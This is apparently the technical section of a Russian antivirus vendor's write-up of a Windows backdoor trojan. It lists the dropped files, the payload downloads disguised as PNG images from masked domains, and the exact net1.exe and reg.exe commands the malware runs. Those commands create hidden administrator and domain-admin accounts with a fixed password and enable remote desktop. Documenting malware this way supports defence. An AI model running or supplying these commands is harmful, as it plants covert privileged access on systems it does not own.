Техническая информация
- '%TEMP%\winlog.exe'
- '%TEMP%\winlog.exe' (загружен из сети Интернет)
- '<SYSTEM32>\net1.exe' group "domain admins" DHCP /add
- '<SYSTEM32>\net1.exe' localgroup "remote desktop users" DHCP /add
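- '<SYSTEM32>\net1.exe' localgroup %USERNAME%s DHCP /add (имя группы искажено автоматической заменой имени пользователя на %USERNAME%; судя по оставшемуся суффиксу «s», вероятно, это локальная группа администраторов — то же относится к аналогичной строке для учётной записи sysadm)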
- '<SYSTEM32>\net1.exe' user DHCP /active:yes
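- '<SYSTEM32>\reg.exe' add "hklm\system\currentcontrolset\control\terminal server" /v fdenytsconnections /t reg_dword /d 0 /f (значение 0 параметра fDenyTSConnections разрешает входящие подключения к удалённому рабочему столу)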
- '<SYSTEM32>\net1.exe' user DHCP h3lp_desk
- '<SYSTEM32>\net1.exe' user DHCP /expires:never
- '<SYSTEM32>\net1.exe' user DHCP h3lp_desk /expires:never /add
- '<SYSTEM32>\net1.exe' localgroup "remote desktop users" sysadm /add
- '<SYSTEM32>\net1.exe' localgroup %USERNAME%s sysadm /add
- '<SYSTEM32>\net1.exe' user sysadm h3lp_desk /expires:never /add
- '<SYSTEM32>\net1.exe' group "domain admins" sysadm /add
- '<SYSTEM32>\net1.exe' user sysadm h3lp_desk
- '<SYSTEM32>\net1.exe' user sysadm /expires:never
- '<SYSTEM32>\net1.exe' user sysadm /active:yes
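- AVP.EXE (процесс антивируса Касперского; заголовок раздела в тексте не сохранился, поэтому действие над этим процессом здесь не указано)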
- %HOMEPATH%\Local Settings\Temporary Internet Files\Content.IE5\U98D4X8H\men9[1].png
- %TEMP%\winlog.exe
- %HOMEPATH%\Local Settings\Temporary Internet Files\Content.IE5\KHMHGZ4F\logo5[1].png
- %TEMP%\task.ini
- 'www.fi######ternational.com.tw':80
- 'fo#####travel.com.my':80
- www.fi######ternational.com.tw/images/men9.png
- fo#####travel.com.my/images/logo5.png
- DNS ASK www.fi######ternational.com.tw
- DNS ASK fo#####travel.com.my
- ClassName: 'Shell_TrayWnd' WindowName: '(null)'